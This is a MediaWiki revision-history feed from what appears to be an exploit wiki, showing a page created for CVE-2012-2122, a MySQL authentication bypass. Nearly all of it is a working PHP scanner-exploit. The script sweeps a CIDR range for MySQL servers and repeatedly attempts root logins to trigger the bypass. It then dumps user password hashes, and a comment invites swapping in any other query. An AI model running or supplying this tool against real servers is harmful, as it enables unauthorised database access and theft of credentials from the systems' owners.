https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2012-2122_Oracle_MySQL%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E
CVE-2012-2122 Oracle MySQL身份驗證繞過漏洞 - Revision history
2026-04-18T08:44:54Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2012-2122_Oracle_MySQL%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=975&oldid=prev
Pwnwiki: Created page with "==Usage== <pre> php scanner.php 10.0.0.1/18 [block in cidr notation] Requirements: php5-cli </pre> ==POC== <pre> <?php /* l0l get at me ;) - Avinza CVE-2012-2..."
2021-04-04T06:10:55Z
<p>Created page with "==Usage== <pre> php scanner.php 10.0.0.1/18 [block in cidr notation] Requirements: php5-cli </pre> ==POC== <pre> <?php /* l0l get at me ;) - Avinza CVE-2012-2..."</p>
<p><b>New page</b></p><div>==Usage==<br />
<pre><br />
php scanner.php 10.0.0.1/18 [block in cidr notation] <br />
<br />
Requirements:<br />
php5-cli<br />
<br />
</pre><br />
<br />
<br />
==POC==<br />
<pre><br />
<?php<br />
/*<br />
l0l get at me ;) - Avinza<br />
CVE-2012-2122 scanner<br />
*/<br />
error_reporting(0);<br />
<br />
<br />
$me = @$argv[0];<br />
<br />
if(!isset($argv[1]) || !strpos($argv[1],"/")) {<br />
printf("php %s %s \n", "{$me}","10.0.0.1/18 [block in cidr notation]"); <br />
/* clean this shit up */<br />
exit;<br />
}<br />
<br />
list($start,$mask) = explode("/",$argv[1]);<br />
<br />
$block=cidr_gen($start,$mask,TRUE);<br />
<br />
//echo print_r($block,1)."\n";<br />
<br />
foreach ($block as $host) {<br />
$open = fsockopen($host, 3306, $errno, $errstr, 30); /* because im lame */<br />
$p = uniqid(mt_rand());<br />
$i = 0;<br />
<br />
if($open){ <br />
printf("#%d accepts connections.\n", $host);<br />
do {<br />
$link = @mysql_connect($host, 'root', $p);<br />
if($link) {<br />
printf("Host %s is vulnerable. Proceeding With Dump\n", $host); <br />
$sql = "SELECT user,password from mysql.user";<br />
/* dump hashes (replace with whatever query */<br />
mysql_select_db('information_schema'); <br />
$results = mysql_query($sql); <br />
if($results) { <br />
printf(" %s ","\n"); <br />
while($row = mysql_fetch_assoc($results)) { <br />
var_dump($row); <br />
printf(" %s ","\n"); <br />
} <br />
} else { <br />
printf(" %s ", "Host Appears to Be Vuln But Query Failed: [{$sql}]: " . mysql_error()); <br />
} <br />
} <br />
//printf("#%d Attempts.\n", $i); <br />
$i++; <br />
} while($i < 512); <br />
} <br />
}<br />
<br />
function cidr_gen($ip,$bitmask=24,$return_array=FALSE) {<br />
$corr=(pow(2,32)-1)-(pow(2,32-$bitmask)-1);<br />
$first=ip2long($ip) & ($corr);<br />
$length=pow(2,32-$bitmask)-1;<br />
if (!$return_array) {<br />
return array(<br />
'first'=>$first,<br />
'size'=>$length+1,<br />
'last'=>$first+$length,<br />
'first_ip'=>long2ip($first),<br />
'last_ip'=>long2ip($first+$length)<br />
);<br />
}<br />
$ips=array();<br />
for ($i=0;$i<=$length;$i++) {<br />
$ips[]=long2ip($first+$i);<br />
}<br />
return $ips;<br />
}<br />
<br />
?><br />
<br />
</pre></div>
Pwnwiki